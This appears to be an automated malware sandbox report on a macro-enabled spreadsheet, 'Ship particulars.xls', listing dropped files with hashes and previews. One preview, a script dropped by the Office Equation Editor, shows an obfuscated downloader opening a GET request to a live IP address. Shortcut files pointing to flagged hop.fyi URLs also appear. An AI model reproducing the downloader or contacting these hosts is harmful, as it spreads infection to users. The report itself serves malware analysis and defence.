        Encrypted:true
        SSDEEP:1536:cX9THBYT6A17j6ZE4+ZVkVIXMK7MpNc+Bj5uuUBQp12RTmmPHFSTm:QTHBq6U/6xVsMKgpNc+ZwuURRTd9STm
        MD5:7F72BA3C4366E5F9603DC0FE9C70D4E4
        SHA1:FA3DACFB4E2ECA8BFAFCCE8BE5ADE7EE7B3722F1
        SHA-256:4BD578FBCFC208744CFEC575FEC397A77AF66D5688E0C3CD034B4628EFDF910A
        SHA-512:B8B7B8D4441609F64AF477301355BC8DAE84A16EA595A4923391530F2EE6F4B3F85437541F6408398593D3E1223B56FFCEBEB119C43D97C6213C640799CA6863
        Malicious:false
        Preview:.PNG........IHDR...............9x....sRGB.........gAMA......a.....pHYs..........+......IDATx^......c7..7z.J !.@..ww.`..........-.......|......d.g..........g...]...*.<.\.l/.......e...w..Q...\.y..qR.0.$&M.D..^....O...M.../...e.6....$..=..M.'a.@JQz.y.....4..a>p.....N.....>E."..z....C...U.W^..qc...Z.f.).........S.D.}...c...t.R.x..e..$...........T.i.&...+J.,...&!f%....;$.+!(.J...ZPe.....RJ..-.Q....l.v..._~.e).....T...a.w.......Jy..E1<>S.....q...T...Z.'.O)A....l..M...Qz.....=...I.3|..}.Y.|....9...6m.0<...q..+V<u......}.](..W_}.....,0U.......[....'.....]..L.2_|..Y.-Z4....N)%A..o..&..{..e.H...../]..[..)..[....9.K...{.c.j-r..o......t.TA............*q..q._}..].4...L..'K.fG..M........,. ....;.]C.[...4i.h......$I.t...E..5..x....>}....N..'L..}.....#+.~.H.N.8A.Pf.M.[.,Xp.%.$....n.:....(..$......N.J+.o.>t1n.8.......#R.{.....^...r..*r+.{.I.7o.V.i.E@.....e.B}G\Dl....R.@.*.u......}..`j..n.8..J.a.g.|-cc..v.Z..-._,Z..{...o..y.f.
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):169096
        Entropy (8bit):3.369564690022728
        Encrypted:false
        SSDEEP:1536:WK83moqvL5TWvyvcSg2JjEeSxqLY5ml1re71NmWqnb11ruEA9TAe:WF3H2t4Sg2JjEWE5mSZB
        MD5:DCF8C56CAB759D132AD0B11703B8015C
        SHA1:C656AF02D26A18CE716A28C36B34BEE75D00E2B4
        SHA-256:38F17A599AC5D645DF3840BBB401710EF81573A747DA20ABBFC1B7D9A9273B58
        SHA-512:F6A9BAEA096279DBDBFD370B26899D259ED6B6DAFA8042594389523EA210CBECDC14ADD78AB7568E1C3EC8C0DF7AFCCAAD0ED7E22A879F6023C8317B6712973C
        Malicious:false
        Preview:....l...........[...y...........%...J... EMF................................@.......................0]..8...Q...............[...y...................\...z...P...(...x........... ...\...z...(...Z...z..... .......................................................................................................................]..V...e,..g...\ ..Q...[...M...]!..V...Q...W...\...h/..i1..Y...\...L...Y...^"..M..~G..}G..}F..}F..}F..}F..}F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..|F..}G...L......................................................................{{{..................................................................................................................................................................................................................................................................................................N...S...S...S...W...X...g...h0..Y...T...W...O...^"..b(..M...M..._$.
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):3153548
        Entropy (8bit):2.7397932875716537
        Encrypted:false
        SSDEEP:768:fa4S1ZO8tQ8biho8LPcF+/8aAvcDOPRBBVwBQm:f8SH8tvcDEzV6F
        MD5:9170A619F3DD24EA36F293426828D9A0
        SHA1:B4226869BD2037D717012FBD2F382A18E539D1B1
        SHA-256:3338B084A9AD923C5C63EB1059B9BBDACA8972136CB01FC983B2A1DE871849B1
        SHA-512:0B045B5F18EDC2739656046345D7B1318397EA11B9FEDA49ADB4F73E1D1DDE9A94C82E34492FD59A0D1B59A22B6A29C1ADAC994ED85A5F08529E5971B24DA21F
        Malicious:false
        Preview:....l...........@...............Yj...... EMF......0.............................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................A... ..."...........!...............................................A... ..."...........!...............................................A... ..."...........!...............................................A... ..."...........!...............................................A... ..."...........!...............................................A... ...'.......................%...........................................................&...........................%...........................6.......@.......%...........L...d...........?...............@.......!...
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
        Category:dropped
        Size (bytes):50128
        Entropy (8bit):3.13941905677619
        Encrypted:false
        SSDEEP:768:4tHbsyguSUifiMcUzARRwn8KEVhyQBzKVO15DQclSBxkrSsAQYWS:yKDAMjARdKGhy0fyBy6
        MD5:A4D3F37D25C314D8BD34E11152527E97
        SHA1:6DF7C881FE8102F196CAE0D5AF9C00CC26583B02
        SHA-256:E0B38B2C8079038B0C98440A0A5945CBB86A41B72154D83EE25F8D362020F9BF
        SHA-512:6E95CA122B9718F0E80D5B666A294A066479365D910F3E450B535ABCEA7F55204122D1CB346DFDF69037FA9CA6EC821A1C05A5F13A162A74D509343F9006D1B2
        Malicious:false
        Preview:.................N...-..........g...Ca.. EMF................M...l........'..}3.......................K...A..I.n.k.s.c.a.p.e. .0...9.2...2. .(.5.c.3.e.8.0.d.,. .2.0.1.7.-.0.8.-.0.6.)...d.1.2.8.0.2.2.b.9.4.c.b.b.c.6.0.6.e.e.1.3.5.0.4.5.e.b.2.7.1.0.2...e.m.f.....................$...$......?...........?............F...,... ...Screen=10205x13181px, 216x279mm.F...4...&...Drawing=1609.4x937.4px, 425.8x248.0mm...............................................................'.......................%...........%...........;................... ...6............#..6............*..6............-..6...........?-..6............-..6............*..6.......!....#..6.......!... ...6.......!...L...6...........U...6.........../...6...............6.........../...6...........U...6...........L...=.......<.......>.......................%...........(...........'.......................%...........%...........;...............z(......6.......u(......6.......o(......6.......n(..I...6.......n(..q...6.......p(......6...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):15872
        Entropy (8bit):5.786328498285187
        Encrypted:false
        SSDEEP:192:bvN7HvndX8OuWRrHvndX8OuWAjzHvndX8OuWlzHvndX8OuWQyPzHvndX8OuW:7N7PdZBrPdZGzPdZ1zPdZTzPdZ
        MD5:1C85DAA45589051215A7B65A4E98A1F4
        SHA1:5782FBA7E32921935BCB2184DA37EEC4C8595FA9
        SHA-256:2E7630A65B60035D6951DC1E7A9ECB065B199F65662EFF44A21CAE94D7D8E8E4
        SHA-512:A0356F941E80878654FA2796BFB261F71312FA856599650656E2DD3CEC2FDA9D1C3096E322F7E6AD4D417E8FC27B54CAFAF53B0A0246825F1794FB6C85E7BADF
        Malicious:true
        Antivirus:
        • Antivirus: Avira, Detection: 100%
        Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):15872
        Entropy (8bit):3.588875001418648
        Encrypted:false
        SSDEEP:384:N7awPl1UNlb2hVZQXgZVcgwhq2I7wQpbL3iZSZ/R6QLOkZ:5lavbnXgwBsBlLSZYhLOkZ
        MD5:4CBD60C35EA9AC2EA7100CF45CDD927A
        SHA1:EC9DB954D2051F5CEA2E24DAE7135AE22FACF7E7
        SHA-256:7D46FD0BA1B08C524695E07D7E2759D61E00D8F88BC1A41558DDDB072B2D23DB
        SHA-512:22A6C5184544B0DE2D4EBAFB5F344AAB3F419B13DC783D5BC52420D693E8CB770BFBC9BA3D76B3CD41DA5A94E6080D59FD7978E93CD33A329D1FDC264625B681
        Malicious:false
        Preview:..............5.3.9.5.4.8.1.0.)...?...[.~.7.?.-.).1.0...7...^...6.:.!.8.0.%.).9.5._.?.(.*.4.!.=.>.,.....*.,...?.`.0.;.)...6.?.?.<.?.).~.|.*./.-.+...&.=.].4.&.:...~._./.9.<.^.3.*.*.-.`.8.@._.|.+.@.2.6.9.-.4.<.>._.?.^.-.?.7.^.^.?.*.-...9.*.%.?.9.<.2.>.>.0.=.>.'.[.%.>./.8.?.'.+.3.&.;.?._.%.`...'.?.1./.).;.?.2.|.7.].).4.6.,.:.|.?.;.5.#.1...;.<.;.0.?.0.$.4.`.#.=.'.3.?.^.%.8.,...<.<.:.8.;.3.-...!.2.6.7.,...0.?./.&.).$.].4.^.$.6./.$.....*.%.=.,.?.!.?.=.?.1.<.~.4.[.=.1.*.&.*.0.%.~.?.`.).3.@.%.?.*.9.%.+.?.=.;.?.?.4.(.?.).|.|./.]...%.=.;.*.].?.?.$.5.?.&.,./.0.;.'.=._.#.:.9.;.8._.?.3.+.?.1.'.`.8.(.7.?.*.(...&.+.!.)...?.6.3.%...8.3.'.,.%.@.!.=.<.'...%.?.5.'.=.7.2.3.].2.9.~.2.=.6.~.].5.-.>.$.<.2.).[.#.+.9.@.,.^.?.1.%...5.(.8.+.&.=.<...(.?.3.!.2.`.]./...8.`.:.=...6.8.:.8...6.@.^.[.#.*.5.,.9.%.?.*.).@./.%.1...%.;.'.?.&.^.,.-.<.0...9.5.?.0.>.?.].0.;.*.=._.,.4.7.:.;.+...?.].!.9.;.&.~.;.^.[.?.%.8.(.].-.9.7.@.1.].6.|...-...%.&.#.=.9.)._.&.!.5.>.,./.!.<.$.4.>.....0./.6.&.?.:.[.>.3...].?.4.'.!.@.1.0.^._.:.
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):1024
        Entropy (8bit):0.05390218305374581
        Encrypted:false
        SSDEEP:3:ol3lYdn:4Wn
        MD5:5D4D94EE7E06BBB0AF9584119797B23A
        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
        Malicious:false
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:very short file (no magic)
        Category:dropped
        Size (bytes):1
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3:U:U
        MD5:C4CA4238A0B923820DCC509A6F75849B
        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
        Malicious:false
        Preview:1
        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        File Type:very short file (no magic)
        Category:dropped
        Size (bytes):1
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3:U:U
        MD5:C4CA4238A0B923820DCC509A6F75849B
        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
        Malicious:false
        Preview:1
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.025771623366727524
        Encrypted:false
        SSDEEP:6:I3DPccFdXNHvxggLRLkmGmjG6aRXv//4tfnRujlw//+GtluJ/eRuj:I3DP5PnkOj+vYg3J/
        MD5:073D4569050B4D0E8B431575371FDD33
        SHA1:2E8A5A8CC3DEC4E8ADA4013682EB4F4FFEFCBE45
        SHA-256:F4B0604B60D65B589F38E49D343A2B9173F0E98C124EB6C72E2F5041F1DE80E8
        SHA-512:3C7D8389B7E41CE52D1FF5A45BBE793474E6B78593A92791A9CF3D4CD50CD6779C189CE2416A69E11E92B05F060273E2E1E359079E4161BCAB030A8605F3C987
        Malicious:false
        Preview:......M.eFy...z.i$.G..L.v_.?A.S,...X.F...Fa.q............................... .O.U...w...............WM.}.1.l.......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):131072
        Entropy (8bit):0.02567728950460136
        Encrypted:false
        SSDEEP:6:I3DPc/RvxggLRfUxIUEg/UBRXv//4tfnRujlw//+GtluJ/eRuj:I3DPKLUxz/AvYg3J/
        MD5:B00A0DF851401FC46F13461395BD0F9C
        SHA1:0681C4309AA7AC369AECAC468631BE92346B63B7
        SHA-256:CC1A5A3DCA08AC93291656C42304C5C6B6BDC76BBFE724916380F75376A9877B
        SHA-512:0C8E9813ED48A0D1094A06DE64F8A982C99779BA257489392A41000156DE6800E1BA40E998CF861766CBAF5A7E80080DA706E9E6D4F1795BF8C83311FAC04A0D
        Malicious:false
        Preview:......M.eFy...z.h=...!@..<.....S,...X.F...Fa.q...............................1T..J..v.dB,.........G.`.b.L...........................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):512
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:BF619EAC0CDF3F68D496EA9344137E8B
        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
        Malicious:false
        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):30208
        Entropy (8bit):7.295464243888002
        Encrypted:false
        SSDEEP:768:uqTAUBP+dudGXy6dMR90KVIKiWZ/t96e:uqTAgWdudGXHKR9VPhH6e
        MD5:B2285AF053BBD04BA5C5E51B65408ECB
        SHA1:D52DA647BE467F22E565CEA54B5B9F698861356A
        SHA-256:D969DE5F3F39244CC16C8087C994F69E3F02E9355F2A66216BF42E8DD26DA6F6
        SHA-512:BBDE360EC597D484329A78822FADA0F6A9D097E667465A14366F728DE49AAC6A92C2B363F8FA4A7D7F8928A6EB5D48EAD8D4352364CD525C04758F6AF2E600F3
        Malicious:false
        Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9.......................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):512
        Entropy (8bit):0.0
        Encrypted:false
        SSDEEP:3::
        MD5:BF619EAC0CDF3F68D496EA9344137E8B
        SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
        SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
        SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
        Malicious:false
        Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:data
        Category:dropped
        Size (bytes):208896
        Entropy (8bit):7.383302991469574
        Encrypted:false
        SSDEEP:6144:VTAGNPrzuHBMixiMK6G+ZFrTUvCp4sJgE:VTHNPrzMpozwjTqCfgE
        MD5:EFCC7FEC417497B25F440C30B8A5904A
        SHA1:47AD226F4743FB0D901F1DC8E81C3839F4965125
        SHA-256:BB2D1A7BC3FE9C0C5276A7323BC02E1AB34F6A209A0C63B9711BA945C26D1568
        SHA-512:C494A674A4E2E363874D263144B1F2CBC477DC8DD7025D76C933EE8D6AF73485EAFD721E7DE72B45F6036B5C63D6165BFA86DE7583A1ED50FEEBF54092D21C3F
        Malicious:false
        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Composite Document File V2 Document, Cannot read section info
        Category:dropped
        Size (bytes):159232
        Entropy (8bit):7.910607708011581
        Encrypted:false
        SSDEEP:3072:Mz2THBq6U/6xVsMKgpNc+ZwuURRTd9STUvHi1T5OspJgNwy4:MzuHBMixiMK6G+ZFrTUvCp4sJg
        MD5:04BF7781451B59CABC57DCC664DC0C26
        SHA1:A31ED889362D12767A9C83A1E87405EC078442AC
        SHA-256:C94817133F6BB8484B5367BC194D55808B47AC312A8C77CD42E72BD1161B8C92
        SHA-512:9863E1FD50EB0675BBF4E3CC6F5BBA72688956137F5CA6B4F4CB2FE2B89101C5004AAB98966984CD36F63509F388AF22D4F3F89AB40168DB273304BBEF5332BB
        Malicious:false
        Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows 95 Internet shortcut text (URL=<http://hop.fyi/>), ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):41
        Entropy (8bit):4.4058556629435985
        Encrypted:false
        SSDEEP:3:HRAbABGQYm/rKeovn:HRYFVm/r8v
        MD5:3492AF6B528C8F0D788FB3BC80F217CB
        SHA1:9CD8520196C02A33B7FD219144329BCE5A8AA125
        SHA-256:7EB370633A7C3B45E33852FE9999E280E30FAE7B7921CFA6949956D737B7EFE4
        SHA-512:0555B0518CDB19389950858C87997DF9A6CFCE895D7294CBD106CA6687C535969C203FA84669824002E53972735FFE3D66C8BC79C8709E437CA07EDCC0D6FD6A
        Malicious:true
        Preview:[InternetShortcut]..URL=http://hop.fyi/..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:Generic INItialization configuration [xls]
        Category:modified
        Size (bytes):94
        Entropy (8bit):4.6661211036204975
        Encrypted:false
        SSDEEP:3:bDCJVUhlCWdkaQtCmMlaQtCv:b+JVUhlDdEtUpts
        MD5:253969B55971434B4D3D9A02245BF111
        SHA1:25CFFEAA5D07129E1BEC3E640A2371990B5F1927
        SHA-256:352948741069C5E5EB366A233C701104A0E315BA3013AA0FDDD61389163B086B
        SHA-512:F99807929E8363AD30ACF3BECDDBE1F06611C0918B17475BF2C01C2E0367B054F08FE5D72A54F17FE6770F95F4B3CAF3D5DF0B2CD8AD384A8FC5C8587D3DA50E
        Malicious:false
        Preview:[folders]..sWel7.url=0..hop.fyi.url=0..Ship particulars.LNK=0..[xls]..Ship particulars.LNK=0..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:MS Windows 95 Internet shortcut text (URL=<http://hop.fyi/sWel7>), ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):46
        Entropy (8bit):4.615422010169679
        Encrypted:false
        SSDEEP:3:HRAbABGQYm/rKeWTJbv:HRYFVm/rCFL
        MD5:DFB29E0514206BFB4292E7EE761E8768
        SHA1:6F89CB328D94981B2C32458FFCF067DDAD597C6F
        SHA-256:DDF13D030FAECBB4B066CA62244BD4C7FE8CD03F38C32D7AC4637A9FA29DD807
        SHA-512:AAF78E1BB02C584D061C67BAFBD4FACC148951267CE4E1AF253D00AABA9C3E8C45DDEF8AD0199A16B8FDC41364E89AB9E33A1C8793DF5E14E407F1CEA94A4DEE
        Malicious:true
        Preview:[InternetShortcut]..URL=http://hop.fyi/sWel7..
        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
        File Type:data
        Category:dropped
        Size (bytes):162
        Entropy (8bit):2.503835550707525
        Encrypted:false
        SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
        MD5:CB3D0F9D3F7204AF5670A294AB575B37
        SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
        SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
        SHA-512:BD116CAF3ACA40A5B90168A022C84923DB51630FA0E62E46020B71B8EB9613EAE776D476B0C6DE0D5F15642A74ED857765150F406937FBA5CB995E9FCDAC81AE
        Malicious:false
        Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
        Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):3490
        Entropy (8bit):3.6906949482142557
        Encrypted:false
        SSDEEP:96:SkfC9YP6kfC9ikfC936xkfC9FkfC9BCkfC9A2N2A2Lv22okfC9+:8ZOA54fg1LHmI
        MD5:F3694C26DDB1CD41FE901D09C6353353
        SHA1:E5EBE307B3984233D87CF9026E2E97521D020C1B
        SHA-256:632A16A322C195DBDC31AFA7CC6A87EEA1086C9C31E955CA728CDFBDAE0E2F22
        SHA-512:73B311755EDD9BB98BD7A603C111DEDAE356693DF97FAEB05BD4A72AA9832B273C51231C48AA2762A30EDF55871DB2356318D7C8A9982C11604F1C0591CB7481
        Malicious:true
        Preview:..D.i.m. .N.B.W.i.z.i.K.L.L.p.d.G.N.W.K.h.N.c.h.W.U.i.l.W.G.W.J.K.A.C.m.g.Z.f.A.l.c.e.l.G.K.C.i.U.n.i.n.K.o.e.b.o.c.K.L.U.d.G.i.O.t.h.W.B.k.i.p.k.N.h.K.u.N.G.c.L.p.t.c.R.z.R.h.W.m.i.R.N.O.A.o.f.L.P.I.L.q.L.N.C.,. .a.L.h.W.u.L.Z.p.p.B.t.W.J.p.L.i.a.m.l.d.L.k.K.h.o.b.t.L.Q.e.K.m.q.T.l.c.K.o.b.g.t.f.g.o.N.f.x.W.J.W.h.x.Z.N.c.h.d.Q.i.z.j.u.p.R.O.A.s.a.T.i.q.u.l.K.q.f.G.O.d.i.A.K.u.Z.f.H.L.k.e.m.R.K.L.B.i.K.K.i.K.L.....S.e.t. .N.B.W.i.z.i.K.L.L.p.d.G.N.W.K.h.N.c.h.W.U.i.l.W.G.W.J.K.A.C.m.g.Z.f.A.l.c.e.l.G.K.C.i.U.n.i.n.K.o.e.b.o.c.K.L.U.d.G.i.O.t.h.W.B.k.i.p.k.N.h.K.u.N.G.c.L.p.t.c.R.z.R.h.W.m.i.R.N.O.A.o.f.L.P.I.L.q.L.N.C. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".M.S.X.M.L.2...S.e.r.v.e.r.X.M.L.H.T.T.P.".).....N.B.W.i.z.i.K.L.L.p.d.G.N.W.K.h.N.c.h.W.U.i.l.W.G.W.J.K.A.C.m.g.Z.f.A.l.c.e.l.G.K.C.i.U.n.i.n.K.o.e.b.o.c.K.L.U.d.G.i.O.t.h.W.B.k.i.p.k.N.h.K.u.N.G.c.L.p.t.c.R.z.R.h.W.m.i.R.N.O.A.o.f.L.P.I.L.q.L.N.C...O.p.e.n. .".G.E.T.".,. .".h.t.t.p.:././.9.1...9.2...2.5.4...2.9./.U.s.e.r.s._.A.P.I./.s.y.
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jul 3 16:59:22 2024, Security: 1
        Category:dropped
        Size (bytes):489472
        Entropy (8bit):7.953394949749945
        Encrypted:false
        SSDEEP:12288:uTHNPdzMpozwjTqCfgLpVRwIBzDTxIYuin3A:eHNPbWWCfgTBrx3NA
        MD5:44580C9385A510A5B84D88553504CE8D
        SHA1:6E62D6DCF087574F5527C982A6D8FA48930E4964
        SHA-256:F59B6743A224907AAEB5AF142CB79CD36F739EEBFAD5BCC4E0F85161C3DBEA62
        SHA-512:D471C16FE9D4851733D0BE3537F03757E374B31042D0A12864A7C9F25D763A9CFC4CF00BE8F7CD0380B85F041492CFD91AE28B755C340A788EE2F0864EDBFE7B
        Malicious:false
        Preview:......................>...................................9...................;...<...m.......n.......p...............................................................................................................................................................................................................................................................................................................................................................................................................................k................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8.......................>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:ASCII text, with CRLF line terminators
        Category:dropped
        Size (bytes):26
        Entropy (8bit):3.95006375643621
        Encrypted:false
        SSDEEP:3:ggPYV:rPYV
        MD5:187F488E27DB4AF347237FE461A079AD
        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
        Malicious:false
        Preview:[ZoneTransfer]....ZoneId=0
        Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
        File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jul 3 16:59:22 2024, Security: 1
        Category:dropped
        Size (bytes):489472
        Entropy (8bit):7.953394949749945
        Encrypted:false
        SSDEEP:12288:uTHNPdzMpozwjTqCfgLpVRwIBzDTxIYuin3A:eHNPbWWCfgTBrx3NA
        MD5:44580C9385A510A5B84D88553504CE8D
        SHA1:6E62D6DCF087574F5527C982A6D8FA48930E4964
        SHA-256:F59B6743A224907AAEB5AF142CB79CD36F739EEBFAD5BCC4E0F85161C3DBEA62
        SHA-512:D471C16FE9D4851733D0BE3537F03757E374B31042D0A12864A7C9F25D763A9CFC4CF00BE8F7CD0380B85F041492CFD91AE28B755C340A788EE2F0864EDBFE7B
        Malicious:true
        Preview:......................>...................................9...................;...<...m.......n.......p...............................................................................................................................................................................................................................................................................................................................................................................................................................k................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8.......................>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Jul 3 03:08:17 2024, Security: 1
        Entropy (8bit):7.915600718880275
        TrID:
        • Microsoft Excel sheet (30009/1) 47.99%
        • Microsoft Excel sheet (alternate) (24509/1) 39.20%
        • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
        File name:Ship particulars.xls
        File size:426'496 bytes
        MD5:1746950a937d2735d7ad8b8633393471
        SHA1:3745c72e69666f9799f25d298f71ea05844a0226
        SHA256:91f02087f468183375ca7489c8936bb562e6d76a4cf39d6402aa9ee672e1c478
        SHA512:75fe2810ca2f74a577add623c3ed90b519d4ad2b5351f3002b12412bb0812a88ca1dfb58f22363ef39a5ccf8ab41c02008afae0fe9b31e0e3f319272180b4a82
        SSDEEP:12288:16NCLNcPpozwjTqCfgQSKxYSbgKMfjN7afnO8g/3:16NCJTWWCfgQSK+fo21/
        TLSH:FB941266330BC717C587E5354FC081EB955ABC10DF128B4F78A8FB6D0E7ABD18662A06
        File Content Preview:........................>...................................A...................D...E...F.......b..............................................................................................................................................................
        Icon Hash:276ea3a6a6b7bfbf
        Document Type:OLE
        Number of OLE Files:1
        Has Summary Info:
        Application Name:Microsoft Excel
        Encrypted Document:True
        Contains Word Document Stream:False
        Contains Workbook/Book Stream:True
        Contains PowerPoint Document Stream:False
        Contains Visio Document Stream:False
        Contains ObjectPool Stream:False
        Flash Objects Count:0
        Contains VBA Macros:True
        Code Page:1252
        Author:
        Last Saved By:
        Create Time:2006-09-16 00:00:00
        Last Saved Time:2024-07-03 02:08:17
        Creating Application:Microsoft Excel
        Security:1
